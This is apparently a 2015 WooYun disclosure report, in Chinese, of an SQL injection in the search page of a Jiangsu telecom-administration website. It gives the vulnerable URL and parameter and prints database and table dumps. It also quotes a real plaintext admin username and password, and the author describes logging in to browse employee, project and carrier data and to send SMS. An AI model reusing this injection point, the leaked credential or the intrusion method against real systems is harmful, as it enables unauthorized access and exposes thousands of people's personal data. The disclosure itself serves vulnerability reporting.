漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0108275
漏洞标题:一次成功获取整个江苏通信行业企业信息的经历
相关厂商:国家互联网应急中心
漏洞作者: bitcoin
提交时间:2015-04-16 09:38
修复时间:2015-06-04 11:18
公开时间:2015-06-04 11:18
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-16: 细节已通知厂商并且等待厂商处理中
2015-04-20: 厂商已经确认,细节仅向厂商公开
2015-04-30: 细节向核心白帽子及相关领域专家公开
2015-05-10: 细节向普通白帽子公开
2015-05-20: 细节向实习白帽子公开
2015-06-04: 细节向公众公开
简要描述:
影响江苏移动、联通、电信、铁通、中国石化等众多企业。
详细说明:
影响江苏移动、联通、电信、铁通、中国石化等众多企业。
不知道有没有精华!
一切的一切源于江苏省通信管理局旗下网站存在的sql注入漏洞
注入点位于江苏省通信建设网页面搜索处
搜索个11
http://www.jstc.gov.cn/Page/System/NewsAllList.aspx?KeyWord=11
参数KeyWord过滤不严,导致注入
available databases [11]:
[*] BBS
[*] EAF
[*] EBS
[*] EPMS
[*] JSCA
[*] jsca-prod
[*] master
[*] model
[*] MPMS
[*] msdb
[*] tempdb
Database: jsca-prod
[79 tables]
+------------------------------------+
| EAF_AccessLog |
| EAF_AccessLogSession |
| EAF_CommittedEmail |
| EAF_CommittedSms |
| EAF_SysConfig |
| EAF_SysProperty |
| EAF_UploadFile |
| EAF_WorkFlowStep |
| EAF_WorkFlowStep20140315 |
| Log |
| TA_EnterpriseAccount |
| TA_JscaUser |
| TA_OperatorAccount |
| TI_Info |
| TI_PicNews |
| TI_StarEnterprise |
| TN_AdministrativeReport |
| TN_ConstructorAuthV2 |
| TN_Employee |
| TN_Enterprise |
| TN_EnterpriseCert |
| TN_EnterpriseCertApplyOrder |
| TN_EnterpriseCertInspect |
| TN_EnterpriseDataChangeOrder |
| TN_EnterpriseEquipment |
| TN_EnterpriseMember |
| TN_EnterpriseOutsideCertApplyOrder |
| TN_EnterpriseOutsideInfo |
| TN_EnterpriseProject |
| TN_EnterpriseRevenue |
| TN_EvaluationByEnterprise |
| TN_EvaluationByOperator |
| TN_LiveBuiltCertApplyOrder |
| TN_OpeningTime |
| TN_PaymentRecord |
| TN_PersonalCertChange |
| TN_SafetyDelayOrder |
| TN_SafetyWorkerAuthV2 |
| TN_TrainingApplication |
| TN_TrainingNotice |
| TP_Project |
| TP_ProjectBatch |
| TP_ProjectCompany |
| TP_ProjectSpotCheck |
| T_AccountLogin |
| T_Appraise |
| T_BatchAppraise |
| T_CommCompanyAppraise |
| T_CompanyBid |
| T_CompanyEnter |
| T_CompanyIntegrity |
| T_CompanyMultidateInfo |
| T_CompanyOuterProvinical |
| T_CompanyUnitAppraise |
| T_Counter |
| T_ExcellentProject |
| T_ExcellentProjectPerson |
| T_Expert |
| T_ExpertAccount |
| T_ExpertBack |
| T_ExpertModify |
| T_ItemAppraise |
| T_JscaCompanyAppraise |
| T_Notice |
| T_NoticeCounter |
| T_NoticeReceive |
| T_OtherBatchAppraise |
| T_OtherCommCompanyAppraise |
| T_OtherCompanyUnitAppraise |
| T_OtherItemAppraise |
| T_OtherJscaCompanyAppraise |
| T_PolicyRegulation |
| T_SendMessage |
| T_StarCompany |
| T_Tender |
| T_Todo |
| T_WorkMistakes |
| Table_1 |
| sysdiagrams |
+------------------------------------+
23524个员工
261万访问记录
select出管理账户密码,密码居然是明文
admin fabaochu2013
登陆进去看看,那叫一个壮观!
可以发送短信哦!
27537个项目
移动、电信等等的好多项目
运营商列表
可直接修改密码
移动、联通、电信等企业的好多项目
电信、中国石化等等企业人员信息
信息非常全啊
漏洞证明:
修复方案:
过滤,修改密码
版权声明:转载请注明来源 bitcoin@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2015-04-20 11:16
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。
最新状态:
暂无